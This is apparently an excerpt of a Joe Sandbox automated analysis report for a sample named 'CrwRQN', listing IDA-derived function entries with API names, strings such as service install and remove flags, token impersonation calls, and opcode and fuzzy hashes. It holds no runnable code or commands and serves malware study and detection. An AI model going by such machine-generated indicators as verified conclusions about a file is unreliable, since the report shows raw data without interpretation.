                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                    • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                    • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                    • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ErrorLastManagerOpen$FileModuleName
                                    • String ID: /remove$/service$vseamps
                                    • API String ID: 67513587-3839141145
                                    • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                    • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                    • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                    • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                    APIs
                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                    • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                    • GetProcAddress.KERNEL32 ref: 000000014000F117
                                      • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: AddressProc$Load$Library
                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                    • API String ID: 3981747205-232180764
                                    • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                    • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                    • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                    • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                    • String ID:
                                    • API String ID: 4284112124-0
                                    • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                    • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                    • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                    • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                    • String ID: vseamps
                                    • API String ID: 3693165506-3944098904
                                    • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                    • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                    • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                    • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: FileModuleName
                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                    • API String ID: 514040917-4022980321
                                    • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                    • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                    • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                    • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                    • String ID:
                                    • API String ID: 2057259594-0
                                    • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                    • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                    • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                    • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                    • String ID:
                                    • API String ID: 3103264659-0
                                    • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                    • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                    • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                    • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                    • String ID:
                                    • API String ID: 3140674995-0
                                    • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                    • Instruction ID: b2cc1f6ef1db7f268444f689d59df3978311126cbc3f024c687a3a524bab2b52
                                    • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                    • Instruction Fuzzy Hash: 9A312A72709E8186EB609F61E8403B96361FB94B64F44407ADB4E47BA8EF78D658C710
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 1269745586-0
                                    • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                    • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                    • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                    • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                    • String ID:
                                    • API String ID: 1239891234-0
                                    • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                    • Instruction ID: 14bcb4aadfa047e3919a13340682992a4958d7db2603e113df2948641334750f
                                    • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                    • Instruction Fuzzy Hash: 57315336714F8186D760CB25E8402BE73A0FB94BA4F5441B6EB9D43B69EF38D155C710
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                    • String ID:
                                    • API String ID: 1445889803-0
                                    • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                    • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                    • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                    • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                    APIs
                                    • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                    • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcess
                                    • String ID:
                                    • API String ID: 1617791916-0
                                    • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                    • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                    • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                    • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$CaptureContext
                                    • String ID:
                                    • API String ID: 2202868296-0
                                    • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                    • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                    • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                    • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ExceptionRaise_clrfp
                                    • String ID:
                                    • API String ID: 15204871-0
                                    • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                    • Instruction ID: 350612e909462ddf8c7d66398e38f65d4e3e7ccbfb714b9238103bc66931a580
                                    • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                    • Instruction Fuzzy Hash: 55B14E73605B858BEB15CF2AC44536C3BA0F794FA8F1589A6DA5E837B4CB39D461C700
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide
                                    • String ID:
                                    • API String ID: 203985260-0
                                    • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                    • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                    • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                    • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                    • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                    • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                    • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                    • Instruction ID: 09fd56858bdbee723bcd404e111e1c859dc7ce875fb04c4189cf390c035200ef
                                    • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                    • Instruction Fuzzy Hash: 1D51E962B08A8195FB109B73A8441BE7BA5BB40FE8F5441B6EE5C67BA9DE3CD411C700
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: EntryFunctionLookup
                                    • String ID:
                                    • API String ID: 3852435196-0
                                    • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                    • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                    • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                    • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                    • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                    • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                    • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                    • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                    • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                    • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -
                                    • API String ID: 0-2547889144
                                    • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
